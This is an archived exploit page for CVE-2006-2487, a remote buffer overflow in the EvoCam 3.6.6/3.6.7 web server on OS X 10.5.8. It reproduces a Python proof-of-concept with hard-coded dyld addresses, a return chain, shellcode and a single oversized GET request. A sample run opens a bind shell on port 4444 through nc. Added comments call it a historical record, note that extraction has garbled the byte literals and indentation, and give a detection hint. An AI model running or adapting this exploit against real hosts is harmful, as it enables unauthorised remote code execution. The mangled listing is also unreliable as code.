





Mac OS X EvoCam web servers 3.6.6 and 3.6.7 remote buffer overflow

CVE Category Price Severity
CVE-2006-2487 CWE-119 Not specified High
Author Risk Exploitation Type Date
Elazar Broad High Remote 2010-06-04
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010060011

Below is a copy:

#!/usr/bin/python

# Archived proof-of-concept for CVE-2006-2487 (CWE-119) in the EvoCam
# 3.6.6 / 3.6.7 web server on OS X 10.5.8 Intel. It opens one TCP
# connection and sends a single oversized HTTP GET request line; the
# filler length is chosen per target version and everything else is
# hard-coded for that one OS build.
#
# NOTE(review): Python 2 syntax (print statements). As archived on this
# page the text has been altered by extraction (indentation, line breaks
# and the byte-string literals), so the listing is kept as a historical
# record of the issue, not as a runnable artifact.
# Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and
3.6.7
# Date: 1st June 2010
# Author: d1dn0t ( didnot __A-T__ me.com )
# Software Link: http://www.pizza.org/evocam.dmg
# Version: EvoCam 3.6.6 and 3.6.7
# Tested on: OS X 10.5.8 Intel

import socket
import sys
import struct
from optparse import OptionParser

# OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Tested on Leopard 10.5.8 Intel
# Paul Harrington didnot __A-T__ me.com
#
#$ ./evocam.py -H 192.168.1.28 -P 8080 -T 2
#EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit
#didnot __A-T__ me.com
#Targeting EvoCam Version 3.6.7
#[+] Sending evil buffer...
#[+] Done!
#[*] Check your shell at 192.168.1.28:4444
#$ nc -v 192.168.1.28 4444
#Connection to 192.168.1.28 4444 port [tcp/krb524] succeeded!
#uname -a
#Darwin Leopard-VM.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15
16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

print "EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow
Exploit"
print "didnot __A-T__ me.com"

# Command-line interface: host, port and a version selector. All three
# are required; the check after option parsing rejects a missing value.
usage =  "%prog -H TARGET_HOST -P TARGET_PORT -T Target "
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string", action="store",
dest="HOST", help="Destination Host")
parser.add_option("-P", "--target_port", type="int", action="store",
dest="PORT", help="Destination Port")
parser.add_option("-T", "--target", type="string", action="store",
dest="TARGET", help="Target Version [1=3.6.6 2=3.6.7]")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT

# BUFLEN (the filler length) is the only per-version difference.
# 0 doubles as the "no valid target" sentinel for the check below.
if options.TARGET == "1" :
print "Targeting EvoCam Version 3.6.6"
 BUFLEN=1560
elif options.TARGET == "2" :
print "Targeting EvoCam Version 3.6.7"
 BUFLEN=1308
else:
BUFLEN=0

# Any missing/zero value (including an unrecognised -T) prints usage and
# exits; no request is sent in that case.
if not (HOST and PORT and BUFLEN):
 parser.print_help()
sys.exit()

# Settings for Leopard 10.5.8
# Fixed addresses read out of the 10.5.8 dyld with nm (see the inline
# commands). Nothing is resolved at run time, so the whole chain is tied
# to that exact OS build.
WRITEABLE = 0x8fe66448
SETJMP = 0x8fe1cf38 #$ nm /usr/lib/dyld | grep "setjmp" #8fe1cf38 t _setjmp
STRDUP = 0x8fe210dc #$ nm /usr/lib/dyld | grep "strdup" #8fe210dc t _strdup
JMPEAX = 0x8fe01041 #0x8fe01041 <__dyld__dyld_start+49>:     jmp    *%eax

NOP="x90x90"

# Payload bytes (as altered by page extraction; see the note at the top).
buf = 
"xdbxd2x29xc9xb1x27xbfxb1xd5xb6xd3xd9x74x24" + 
"xf4x5ax83xeaxfcx31x7ax14x03x7axa5x37x43xe2" + 
"x05x2exfcx45xd5x11xadx17x65xf0x80x18x8ax71" + 
"x64x19x94x75x10xdfxc6x27x70x88xe6xc5x65x14" + 
"x6fx2axefxb4x3cxfbxa2x04xaaxcexc3x17x4dx83" + 
"x95x85x21x49xd7xaax33xd0xb5xf8xe5xbex89xe3" + 
"xc4xbfx98x4fx5fx78x6dxabxdcx6cx8fx08xb1x25" + 
"xc3x3ex6fx07x63x4cxccx14x9fxb2xa7xebx51x75" + 
"x17x5cxc2x25x27x67x2fx45xd7x08x93x6bxa2x21" + 
"x5cx31x81xb2x1fx4cx19xc7x08x80xd9x77x5fxcd" + 
"xf6x04xf7x79x27x89x6ex14xbexaex21xb8x93x60" + 
"x72x03xdex01x43xb4xb0x88x47x64x60xd8xd7xd5" + 
"x30xd9x1ax55x01x26xf4x06x21x6bx75xac"

FRAG0 = "x90" + "x58" + "x61" + "xc3"
FRAG1 = "x90" + "x58" + "x89xe0" + "x83xc0x0e"  + "x89x44x24x08"
+ "xc3" # 0C is a bad character

# STUB is built from the fixed dyld addresses above with struct.pack
# ('<I' = 32-bit little-endian), so it is only meaningful for the 10.5.8
# Intel build the addresses were taken from.
STUB =  
FRAG0 + 
 struct.pack('<III',SETJMP,WRITEABLE+32,WRITEABLE) + 
FRAG1 + 
 'A'*20 +
struct.pack('<IIIII',SETJMP,WRITEABLE+24,WRITEABLE,STRDUP,JMPEAX) + 
 'A'*4

# The request-target: BUFLEN filler bytes, then STUB, NOP and buf.
# Detection note: the resulting GET request line is well over 1300 bytes
# and consists mostly of one repeated byte, which no legitimate EvoCam
# client request would look like.
BUFFER = "A"*BUFLEN + STUB + NOP + buf

# One unauthenticated TCP connection, one send, no response read.
# socket.connect() returns None, so `connect` is never used. There is no
# timeout and no error handling: a refused or unreachable host raises
# socket.error uncaught.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((HOST,PORT))
print '[+] Sending evil buffer...'
s.send("GET " +BUFFER + " HTTP/1.0rnrn")
print "[+] Done!"
# The port printed here is fixed by the payload, not by any option.
print "[*] Check your shell at %s:4444 " % HOST
s.close()

